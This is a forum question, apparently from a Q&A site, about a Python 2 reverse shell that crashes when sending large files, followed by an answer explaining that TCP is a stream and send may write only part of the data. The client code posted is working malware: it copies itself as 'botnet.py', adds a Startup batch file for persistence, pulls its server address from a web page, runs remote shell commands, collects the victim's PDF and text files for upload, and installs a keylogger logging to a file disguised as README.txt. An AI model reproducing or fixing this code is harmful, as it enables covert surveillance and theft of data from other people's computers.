I'm currently creating a TCP based reverse shell(client is on remote computer, connects to local server) that can both send and receive files, and also send shell commands through TCP. The programs works fine in every other aspect(eg, receive and send commands, server receive files)most of the time until when I try to send large files(larger than 1 kb I remember)from the server to the client. What happens is when I try to send the large files, after the server is done sending it, the client side crashes for some reason. I cannot even see the error message. I have tried to debug it by displaying the received content on the client side but it seems to receive fine but crashes immediately. I will attach both the client code and the server code for those of you who wants to help. The code is a bit weird because I added some "flags" during my first debugs. Thank You.
Server code:
import socket, pickle, time, os
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = 'localhost'
port = 1024
server.bind((address, port))
server.listen(5)
c, addr = server.accept()
file_list = {}
print'connection from: '+str(addr)
print'remote shell can only be used for utility purpose, when switching dirve, use "//" between cd and address'
os.chdir("C:/Users/Insert_Name/Desktop/Server")
while True:
command = raw_input(str(addr)+'>>')
if command == 't':
c.send(command)
cile_list = c.recv(1024)
cile_lista = pickle.loads(cile_list)
for key, value in cile_lista.iteritems():
if 'Downloads' in key:
a, sep, b = key.partition('/Downloads/')
if 'Documents' in key:
a, sep, b = key.partition('/Documents/')
if 'JAVA' in key:
a, sep, b = key.partition('/JAVA_BACKUP/')
output = open(b, 'wb')
content = c.recv(value)
output.write(content)
output.close()
print'file transfer complete'
if command == 'a':
c.send(command)
print'enter T to indicate file list complete'
patha = raw_input('Enter file path(must be in server directory, aka Server): ')
while patha != 'T':
try:
f = open(patha,'rb')
f.close()
size = os.path.getsize(patha)
a, sep, b = str(size).partition('L')
file_list[patha] = int(a)
except:
print'invalid file name'
patha = raw_input('Enter file path(must be in server directory): ')
if len(file_list) == 0:
c.send(pickle.dumps({'0.txt':0}))
else:
file_lista = pickle.dumps(file_list)
c.send(file_lista)
print file_list
for file in file_list:
os.chdir("C:/Users/Insert_Name/Desktop/Server")
content = open(file, 'rb')
content = content.read()
c.send(content)
file_list.clear()
if command != 't':
if command != 'a':
if 'start' in command:
c.send(command)
else:
c.send(command)
if '//' in command:
a, sep, b = command.partition('//')
c.send(b)
feedback = c.recv(1024)
print feedback
while True:
feedback = c.recv(1024)
if '_DONE_' in feedback:
a, sep, b = feedback.partition('_SEP_')
print a
break
print feedback
Client Code:
import socket, os, textract, pickle, requests, time, threading, subprocess, getpass, shutil, lxml, glob, pyHook, pythoncom, sys, logging
from shutil import copyfile
from lxml import html
from os import listdir
#var is the varification webiste
var = 'https://www.publishthis.email/test-SJC9dAQ3G'
file_list = {}
print file_list
username = getpass.getuser()
def duplication(username):
source = "C:/Users/"+username+"/Downloads/MATH_COUNTS/botnet.py"
destination = "C:/Users/"+username+"/Saved Games"
shutil.copy(source, destination)
setup = open('C:/Users/'+ username+'/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/setup.bat', 'w')
pl =('@echo off\nstart C:\Users/%USERNAME%/Saved Games/botnet.py')
setup.write(pl)
setup.close()
def communication(var):
page = requests.get(var)
print page
tree = html.fromstring(page.content)
address = tree.xpath('//div[@class = "body"]/div[@dir = "ltr"]/text()')
address = ''.join(address)
address = address.replace("'", "")
return address
def keylogger(username):
filename = "C:/Users/"+username+"/Saved Games/README.txt"
def keylog(event):
username = getpass.getuser()
logging.basicConfig(filename ="C:/Users/"+username+"/Saved Games/README.txt" , level=logging.DEBUG, format = '%(message)s')
chr(event.Ascii)
logging.log(10, chr(event.Ascii))
return True
hm = pyHook.HookManager()
hm.KeyDown = keylog
hm.HookKeyboard()
pythoncom.PumpMessages()
def tcp_connection(address, username):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = client.connect((address, 1024))
while True:
command = client.recv(1024)
if command != 'a':
if command == 't':
file_gatherer(username)
print file_list
file_lista = pickle.dumps(file_list)
client.send(file_lista)
for file in file_list:
file = open(file, 'rb')
file = file.read()
client.send(file)
if command != 't':
if command != 'a':
if 'cd' in command:
f = os.getcwd()
b = client.recv(1024)
try:
os.chdir(b)
r = os.getcwd()
except:
r = 'error: invalid directory name'
else:
result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
f = result.stdout.read()
r = result.stderr.read()
client.send(f)
client.send(r)
client.send('_SEP_/n_DONE_')
if command == 'a':
cile_list = client.recv(1024)
cile_lista = pickle.loads(cile_list)
print cile_lista
for key, value in cile_lista.iteritems():
output = open(key, 'wb')
content = client.recv(value)
print content
output.write(content)
output.close()
def file_gatherer(username):
try:
os.makedirs("C:/Users/"+username+"/Games/JAVA_BACKUP")
except:
pass
for file in os.listdir("C:/Users/"+username+"/Games/JAVA_BACKUP"):
try:
file_list["C:/Users/"+username+"/Games/JAVA_BACKUP/" + file] = os.path.getsize(file)
except:
pass
os.chdir("C:/Users/"+username+"/Downloads")
for file in glob.glob('*.pdf'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Downloads/" + file] = int(a)
for file in glob.glob('*.txt'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Downloads/" + file] = int(a)
os.chdir("C:/Users/"+username+"/Documents")
for file in glob.glob('*.pdf'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Documents/" + file] = int(a)
#for file in glob.glob('*.txt'):
# file_list["C:/Users/"+username+"/Documents/" + file] = os.path.getsize(file)
tcp_connection('localhost', username)
def main():
duplication()
keylogger()
address = communication(var)
file_gatherer()
file_transfer(address)
The problem is just the file transfer.
Python Socket TCP connection size limit?
Your are actually asking the wrong question. The real problem is that TCP is a streaming protocol and you are treating it as a message protocol, i.e. you assume in your code that each send on one side will be handled by exactly one recv at the peer. Apart from that you assume that send will write the complete buffer given as argument but the documentation clearly states that it does not:
Applications are responsible for checking that all data has been sent; if only some of the data was transmitted, the application needs to attempt delivery of the remaining data.
Ignoring this means that you might face incomplete "messages" when reading or that you get multiple "messages" (or one fill and one partial or similar) when reading the data. This might for example lead to crashes when trying to unpickle data.
But to get to the size limit: it is limited how many data you can actually write within a single send. This limit depends on the size of the socket buffer and also on the current state of the socket, i.e. if the socket is already filled or not. If you use ssl sockets it is further limited by the maximum size of a SSL frame. But by itself TCP has no limits on how much data can be transmitted, but you need multiple writes to the socket if you deliver many data.
The client program contains a keylogger, which is for now useless because I haven't created a command to activate it yet, so you can just ignore that.
It helps a lot when debugging a problem yourself or asking others to help you debugging it, if you throw everything away which is not actually needed to reproduce the problem. See How to create a Minimal, Complete, and Verifiable example.